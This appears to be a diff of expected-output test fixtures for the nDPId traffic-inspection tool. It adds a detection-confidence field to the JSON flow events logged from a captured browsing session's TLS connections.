+01310{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -333,116 +333,116 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
